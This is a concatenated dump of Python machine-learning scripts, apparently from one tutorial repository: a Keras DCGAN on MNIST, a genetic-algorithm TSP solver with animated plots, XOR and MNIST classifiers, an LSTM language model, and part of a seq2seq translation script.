return image, keypoints
def normalize_image(image, to_gray=True):
if image.shape[2] == 4:
# if the image has an alpha color channel (opacity)
# let's just remove it
image = image[:, :, :3]
# get the height & width of image
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
# scaling the image to IMAGE_SIZE
# image = cv2.resize(image, (new_w, new_h))
image = resize_image(image, (new_w, new_h))
if to_gray:
# convert image to grayscale
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# normalizing pixels from the range [0, 255] to [0, 1]
image = image / 255.0
if to_gray:
image = np.expand_dims(image, axis=2)
return image
def normalize_keypoints(image, keypoints):
# get the height & width of image
h, w = image.shape[:2]
# reshape to coordinates (x, y)
# i.e. converting a vector of shape (136,) to a 2D array of shape (68, 2)
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
keypoints = keypoints.reshape(-1, 2)
# scale the keypoints also
keypoints = keypoints * [new_w / w, new_h / h]
keypoints = keypoints.reshape(-1)
# normalizing keypoints from [0, IMAGE_SIZE] to [0, 1] (experimental)
keypoints = keypoints / 224
# keypoints = (keypoints - 100) / 50
return keypoints
def normalize(image, keypoints, to_gray=True):
image, keypoints = random_crop(image, keypoints)
return normalize_image(image, to_gray=to_gray), normalize_keypoints(image, keypoints)
def load_data(csv_file, to_gray=True):
# read the training dataframe
df = pd.read_csv(csv_file)
all_keypoints = np.array(df.iloc[:, 1:])
image_names = list(df.iloc[:, 0])
# load images
X, y = [], []
X = np.zeros((len(image_names), *IMAGE_SIZE, 3), dtype="float32")
y = np.zeros((len(image_names), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
for i, (image_name, keypoints) in enumerate(zip(tqdm(image_names, "Loading " + os.path.basename(csv_file)), all_keypoints)):
image = mpimg.imread(os.path.join("data", "training", image_name))
image, keypoints = normalize(image, keypoints, to_gray=to_gray)
X[i] = image
y[i] = keypoints
return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
def __init__(self, img_x=28, img_y=28, img_z=1):
self.img_x = img_x
self.img_y = img_y
self.img_z = img_z
self.D = None # discriminator
self.G = None # generator
self.AM = None # adversarial model
self.DM = None # discriminator model
def discriminator(self):
if self.D:
return self.D
self.D = Sequential()
depth = 64
dropout = 0.4
input_shape = (self.img_x, self.img_y, self.img_z)
self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
# convert to 1 dimension
self.D.add(Flatten())
self.D.add(Dense(1, activation="sigmoid"))
print("="*50, "Discriminator", "="*50)
self.D.summary()
return self.D
def generator(self):
if self.G:
return self.G
self.G = Sequential()
dropout = 0.4
# converting the 100-dim noise vector to dim x dim x depth
# (100,) to (7, 7, 256)
depth = 64 * 4
dim = 7
self.G.add(Dense(dim*dim*depth, input_dim=100))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Reshape((dim, dim, depth)))
self.G.add(Dropout(dropout))
# upsampling to (14, 14, 128)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# up to (28, 28, 64)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 32)
self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 1) (img)
self.G.add(Conv2DTranspose(1, 5, padding="same"))
self.G.add(Activation("sigmoid"))
print("="*50, "Generator", "="*50)
self.G.summary()
return self.G
def discriminator_model(self):
if self.DM:
return self.DM
# optimizer = RMSprop(lr=0.001, decay=6e-8)
optimizer = Adam(0.0002, 0.5)
self.DM = Sequential()
self.DM.add(self.discriminator())
self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.DM
def adversarial_model(self):
if self.AM:
return self.AM
# optimizer = RMSprop(lr=0.001, decay=3e-8)
optimizer = Adam(0.0002, 0.5)
self.AM = Sequential()
self.AM.add(self.generator())
self.AM.add(self.discriminator())
self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.AM
class MNIST:
def __init__(self):
self.img_x = 28
self.img_y = 28
self.img_z = 1
self.steps = 0
self.load_data()
self.create_models()
# used image indices
self._used_indices = set()
def load_data(self):
(self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
# reshape to (num_samples, 28, 28 , 1)
self.X_train = np.expand_dims(self.X_train, axis=-1)
self.X_test = np.expand_dims(self.X_test, axis=-1)
def create_models(self):
self.GAN = GAN()
self.discriminator = self.GAN.discriminator_model()
self.adversarial = self.GAN.adversarial_model()
self.generator = self.GAN.generator()
discriminators = glob.glob("discriminator_*.h5")
generators = glob.glob("generator_*.h5")
adversarial = glob.glob("adversarial_*.h5")
if len(discriminators) != 0:
print("[+] Found a discriminator ! Loading weights ...")
self.discriminator.load_weights(discriminators[0])
if len(generators) != 0:
print("[+] Found a generator ! Loading weights ...")
self.generator.load_weights(generators[0])
if len(adversarial) != 0:
print("[+] Found an adversarial model ! Loading weights ...")
self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
self.adversarial.load_weights(adversarial[0])
def get_unique_random(self, batch_size=256):
indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# while in_used_indices:
# indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# self._used_indices |= set(indices)
# if len(self._used_indices) > self.X_train.shape[0] // 2:
# if used indices is more than half of training samples, clear it
# that is to enforce it to train at least more than half of the dataset uniquely
# self._used_indices.clear()
return indices
def train(self, train_steps=2000, batch_size=256, save_interval=0):
noise_input = None
steps = tqdm.tqdm(list(range(self.steps, train_steps)))
fake = np.zeros((batch_size, 1))
real = np.ones((batch_size, 1))
for i in steps:
real_images = self.X_train[self.get_unique_random(batch_size)]
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
noise = np.random.normal(size=(batch_size, 100))
fake_images = self.generator.predict(noise)
# get 256 real images and 256 fake images
d_loss_real = self.discriminator.train_on_batch(real_images, real)
d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# X = np.concatenate((real_images, fake_images))
# y = np.zeros((2*batch_size, 1))
# 0 for fake and 1 for real
# y[:batch_size, :] = 1
# shuffle
# shuffle_in_unison(X, y)
# d_loss = self.discriminator.train_on_batch(X, y)
# y = np.ones((batch_size, 1))
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
# fool the adversarial, telling him everything is real
a_loss = self.adversarial.train_on_batch(noise, real)
log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
steps.set_description(log_msg)
if save_interval > 0:
noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
if (i + 1) % save_interval == 0:
self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
self.discriminator.save(f"discriminator_{i+1}.h5")
self.generator.save(f"generator_{i+1}.h5")
self.adversarial.save(f"adversarial_{i+1}.h5")
def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
filename = "mnist_fake.png"
if fake:
if noise is None:
noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
else:
filename = f"mnist_{step}.png"
images = self.generator.predict(noise)
else:
i = np.random.randint(0, self.X_train.shape[0], samples)
images = self.X_train[i]
if noise is None:
filename = "mnist_real.png"
plt.figure(figsize=(10, 10))
for i in range(images.shape[0]):
plt.subplot(4, 4, i+1)
image = images[i]
image = np.reshape(image, (self.img_x, self.img_y))
plt.imshow(image, cmap="gray")
plt.axis("off")
plt.tight_layout()
if save2file:
plt.savefig(filename)
plt.close("all")
else:
plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
if __name__ == "__main__":
mnist_gan = MNIST()
mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
mnist_gan.plot_images(fake=True, save2file=True)
mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
def __init__(self, object):
self.object = object
def update(self, new):
self.object = new
def __repr__(self):
return self.object
def __str__(self):
return self.object
class GeneticAlgorithm:
"""General purpose genetic algorithm implementation"""
def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
self.individual = individual
self.popsize = popsize
self.elite_size = elite_size
self.mutation_rate = mutation_rate
self.generations = generations
if not callable(fitness_func):
raise TypeError("fitness_func must be a callable object.")
self.get_fitness = fitness_func
self.plot = plot
self.prn = prn
self.population = self._init_pop()
self.animate = animation_func
def calc(self):
"""Try to find the best individual.
This function returns a tuple of (initial_route, final_route, distance)."""
sorted_pop = self.sortpop()
initial_route = self.population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
progress = [ distance ]
if callable(self.animate):
self.plot = True
individual = Individual(initial_route)
stop_animation = Event()
self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
else:
self.plot = False
if self.prn:
print(f"Initial distance: {distance}")
try:
if self.plot:
for i in range(self.generations):
population = self.next_gen()
sorted_pop = self.sortpop()
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
individual.update(route)
else:
for i in range(self.generations):
population = self.next_gen()
distance = 1 / self.sortpop()[0][1]
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
try:
stop_animation.set()
except NameError:
pass
final_route_index = self.sortpop()[0][0]
final_route = population[final_route_index]
if self.prn:
print("Final route:", final_route)
return initial_route, final_route, distance
def create_population(self):
return random.sample(self.individual, len(self.individual))
def _init_pop(self):
return [ self.create_population() for i in range(self.popsize) ]
def sortpop(self):
"""This function calculates the fitness of each individual in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(self):
sorted_pop = self.sortpop()
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
df['cum_sum'] = df['Fitness'].cumsum()
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
for i in range(len(sorted_pop) - self.elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ self.population[index] for index in result ]
def breed(self, parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(self, selection):
pool = random.sample(selection, len(selection))
children = [selection[i] for i in range(self.elite_size)]
children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
return children
def mutate(self, individual):
individual_length = len(individual)
for swapped in range(individual_length):
if(random.random() < self.mutation_rate):
swap_with = random.randint(0, individual_length-1)
individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
return individual
def mutate_population(self, children):
return [ self.mutate(individual) for individual in children ]
def next_gen(self):
selection = self.selection()
children = self.breed_population(selection)
self.population = self.mutate_population(children)
return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for i, city in enumerate(route):
if i == 0:
col.text(city.x-5, city.y+5, "Start")
col.scatter(city.x, city.y, s=70, c='g')
else:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
def animate():
nonlocal route
_, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
if isinstance(route, Individual):
target = route.object
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for i, city in enumerate(target):
if i == 0:
ax1[0].text(city.x-5, city.y+5, "Start")
ax1[0].scatter(city.x, city.y, s=70, c='g')
else:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
if plot_conclusion:
initial_route = plot_conclusion
plot_routes(initial_route, target)
Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
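# fitness is defined below as the inverse of the total route distance (City.__sub__
# above makes (from_city - to_city) the Euclidean distance), so shorter routes get
# higher fitness and sort first in GeneticAlgorithm.sortpop()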
def get_fitness(route):
def get_distance():
distance = 0
for i in range(len(route)):
from_city = route[i]
to_city = route[i+1] if i+1 < len(route) else route[0]
distance += (from_city - to_city)
return distance
return 1 / get_distance()
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
def benchmark(cities):
popsizes = [60, 80, 100, 120, 140]
elite_sizes = [5, 10, 20, 30, 40]
mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
generations = 1200
iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
iteration = 0
gens = {}
for popsize in popsizes:
for elite_size in elite_sizes:
for mutation_rate in mutation_rates:
iteration += 1
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
initial_route, final_route, generation = gen.calc(ret=("generation", 755))
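# note: this assumes a calc() variant that accepts a `ret` argument and reports the
# generation at which a target distance (755 here) was reached; the GeneticAlgorithm.calc()
# defined above takes no arguments, so this benchmark would need that extension to run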
if generation == generations:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
else:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
if generation != generations:
gens[iteration] = generation
# reversed_gen = {v:k for k, v in gens.items()}
output = sorted(gens.items(), key=operator.itemgetter(1))
for i, gens in output:
print(f"Iteration: {i} generations: {gens}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# Notes:
# 1.1 Increasing the mutation rate too much makes the distance curve inconsistent and prevents it from converging to the optimal distance.
# 1.2 So the mutation rate should be kept as small as 1% or lower.
# 2. The elite size should be roughly 30% or less of the total population.
# 3. The number of generations depends on the other parameters; it can be a fixed number, or the run can continue until the optimal distance is reached.
# 4.
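# a minimal run in line with notes 1 and 2 above (a sketch only, reusing the
# GeneticAlgorithm and get_fitness defined in this file):
#
#   gen = GeneticAlgorithm(load_cities(), popsize=100, elite_size=30,
#                          mutation_rate=0.01, generations=1200,
#                          fitness_func=get_fitness, prn=False)
#   initial_route, final_route, distance = gen.calc()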
if __name__ == "__main__":
from genetic import GeneticAlgorithm
cities = load_cities()
# cities = generate_cities(50)
# parameters
popsize = 120
elite_size = 30
mutation_rate = 0.1
generations = 400
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
np.random.seed(19)
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent activation for the first hidden layer (8 nodes)
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid activation for the output (final) layer
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuracy
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
epochs = 3
batch_size = 64
# building the network now
class Net(nn.Module):
def __init__(self):
super().__init__()
# takes 28x28 images
self.fc1 = nn.Linear(28*28, 64)
self.fc2 = nn.Linear(64, 64)
self.fc3 = nn.Linear(64, 64)
self.fc4 = nn.Linear(64, 10)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = self.fc4(x)
return F.log_softmax(x, dim=1)
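# note: log_softmax here pairs with F.nll_loss in the training loop below; together
# they are equivalent to applying nn.CrossEntropyLoss to the raw logits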
if __name__ == "__main__":
training_set = datasets.MNIST("", train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
test_set = datasets.MNIST("", train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
# load the dataset
train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
# construct the model
net = Net()
# specify the loss and optimizer
loss = nn.CrossEntropyLoss()
optimizer = optim.Adam(net.parameters(), lr=0.001)
# training the model
for epoch in range(epochs):
for data in train:
# data is the batch of data now
# X are the features, y are labels
X, y = data
net.zero_grad() # set gradients to 0 before loss calculation
output = net(X.view(-1, 28*28)) # feed data to the network
loss = F.nll_loss(output, y) # calculating the negative log likelihood
loss.backward() # back propagation
optimizer.step() # attempt to optimize weights to account for loss/gradients
print(loss)
correct = 0
total = 0
with torch.no_grad():
for data in test:
X, y = data
output = net(X.view(-1, 28*28))
for index, i in enumerate(output):
if torch.argmax(i) == y[index]:
correct += 1
total += 1
print("Accuracy:", round(correct / total, 3))
# testing
print(torch.argmax(net(X.view(-1, 28*28))[0]))
plt.imshow(X[0].view(28, 28))
plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
if bidirectional:
model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
return model
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage.interpolation import shift
import numpy as np
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=6,
inter_op_parallelism_threads=6,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
# predicted_word_int = model.predict_classes(encoded)[0]
# print(predicted_word_int, end=',')
# word = sequence_to_text(predicted_word_int)
# encoded = shift(encoded, -1, cval=predicted_word_int)
# print(word, end=' ')
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
epochs=100,
callbacks=[checkpointer],
verbose=1,
steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
p = inflect.engine()
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
with open("data/vocab1.txt") as f:
for line in f:
add(line.strip())
vocab = sorted(vocab)
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
global vocab
global word2int
global int2word
vocab.append(word)  # vocab is a sorted list at this point, not a set
next_int = max(int2word) + 1
word2int[word] = next_int
int2word[next_int] = word
def save_vocab(_vocab):
with open("vocab1.txt", "w") as f:
for w in sorted(_vocab):
print(w, file=f)
def text_to_sequence(text):
return [ word2int[word] for word in text.split() ]
def sequence_to_text(seq):
return ' '.join([ int2word[i] for i in seq ])
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
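# e.g. with batch_size=128 and n_steps=50 (the values used by the training script above),
# each yielded x and y has shape (1, 128, 50)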
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
def get_data(arr, n_seq, look_forward):
n_samples = len(arr) // n_seq
X = np.zeros((n_seq, n_samples))
Y = np.zeros((n_seq, n_samples))
for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
x = arr[i:i+n_seq]
y = arr[i+look_forward:i+n_seq+look_forward]
if len(x) != n_seq or len(y) != n_seq:
break
X[:, index] = x
Y[:, index] = y
return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_text(path, files=["carroll-alice.txt", "text.txt", "text8.txt"]):
global vocab
global word2int
global int2word
text = ""
file = files[0]
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file, encoding="utf8") as f:
text += f.read().lower()
punc = set(punctuation)
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
for ws in whitespace:
text = text.replace(ws, " ")
text = text.split()
co = 0
vocab_set = set(vocab)
for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# convert digits to words
# (i.e '7' to 'seven')
if text[i].isdigit():
text[i] = p.number_to_words(text[i])
# compare_nouns
# compare_adjs
# compare_verbs
if text[i] not in vocab_set:
text[i] = UNK
co += 1
# update vocab, intersection of words
print("vocab length:", len(vocab))
vocab = vocab_set & set(text)
print("vocab length after update:", len(vocab))
save_vocab(vocab)
print("Number of unks:", co)
return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def predict_sequence(enc, dec, source, n_steps, docoder_num_tokens):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
target_seq = np.zeros((1, 1, n_steps))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
target_seq = np.zeros((1, 1, n_steps))
target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
return np.array(output)
def logits_to_text(logits, index_to_words):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return ' '.join([index_to_words[prediction] for prediction in logits])
# load the data
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
while True:
text = input("> ")
tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
print(tokenized.shape)
